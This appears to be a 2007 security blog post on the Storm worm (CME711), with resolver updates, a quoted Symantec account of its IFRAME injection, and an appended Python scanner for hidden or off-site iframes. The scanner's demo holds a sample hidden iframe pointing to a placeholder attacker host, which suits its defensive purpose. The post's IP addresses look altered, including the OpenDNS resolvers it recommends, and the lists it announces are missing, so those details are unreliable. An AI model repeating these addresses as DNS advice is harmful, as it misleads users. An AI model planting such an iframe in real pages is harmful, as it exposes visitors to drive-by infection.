This first set of quotes is from the other day, and many other sites have been carrying it in one form or another. But Symantec, below that, is the first site I've seen to show these details and they ain't good.
Once again, CME711's domain resolvers are all pointing to 0.0.0.0, which suggests another change is upon us.

Update from Randy V
What will it be this time? Baseball? My home team has just swept the Diamondbacks and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!
They are back in full force. A nearly complete turnover of the active list from yesterday:

Update 2 (from Nicholas):
and the currently active list:
Only 126.96.36.199, 188.8.131.52 and 184.108.40.206 are in common. 220.127.116.11 is probably only a proxy.
Baseball does sound like a ripe target. There has not been a page change yet.
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 18.104.22.168 and 22.214.171.124. For more information visit the OpenDNS website.
This is gonna get ugly... fast.
The encryption is trivial and isn't the only new thing found in this variant. It seems to have some new techniques for propagation. Firstly, it is able to scan the file system and drop an executable into any folder with at least one .exe file. Secondly, the worm is able to harvest email addresses from the file system and send spam to those addresses. Lastly, it is able to search for .htm, .html, and .php files and inject malicious IFRAME code into them. We believe that this part of the worm is still under development due to the buggy nature of the code we are seeing. The IFRAME tag isn't hard-coded. We suspect this information must be coming from the P2P C&C. (Symantec Security Response Blog)
We were able to use our favorite search engine to look for one of the known tags within the IFRAME and we saw some sites that were already infected. These sites each lead us to a fast-flux domain of the Storm worm. Considering how much this worm has evolved and where it is at currently, I think it's time for us to escalate this worm to hurricane category.
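The IFRAME injection into .htm/.html/.php files that Symantec describes above is something a web server operator can check for on their own document root. The following is an added example and not code from Symantec or the original post: a small Python scanner that walks a directory for web files and flags iframes that either point to a host outside the site or are hidden (zero size, display:none). The site's own hostnames and the sample files are constructed for the demo.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Opening <iframe ...> tag; group 1 is the raw attribute string.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Typical ways an injected frame is kept invisible to the visitor.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE)
WEB_EXTS = {".htm", ".html", ".php"}  # file types named in the Symantec write-up

def suspicious_iframes(html, own_hosts):
    """Return (src, hidden) for each iframe that is off-site or hidden."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = m.group(1)
        src_m = SRC_RE.search(attrs)
        src = src_m.group(1) if src_m else ""
        host = (urlparse(src).hostname or "").lower()
        hidden = bool(HIDDEN_RE.search(attrs))
        offsite = bool(host) and host not in own_hosts
        if offsite or hidden:
            hits.append((src, hidden))
    return hits

def scan_tree(root, own_hosts):
    """Walk root; return {path: hits} for web files with suspicious iframes."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTS:
                continue  # only the extensions the worm is reported to target
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_iframes(fh.read(), own_hosts)
            if hits:
                findings[path] = hits
    return findings

# Constructed sample site for the demo; the "evil.example" host is a placeholder.
SAMPLE_FILES = {
    "index.html": "<html><body><iframe src='/about.html' width='400'></iframe></body></html>",
    "contact.php": "<?php echo 'x'; ?><iframe src=\"http://evil.example/x.php\" width=0 height=0></iframe>",
    "notes.txt": "<iframe src='http://evil.example'></iframe>",  # not a web file, skipped
}

def demo():
    """Write the sample files to a temp dir and scan them; returns {basename: hits}."""
    with tempfile.TemporaryDirectory() as root:
        for name, content in SAMPLE_FILES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(content)
        return {os.path.basename(p): h for p, h in scan_tree(root, {"www.example.org"}).items()}

if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```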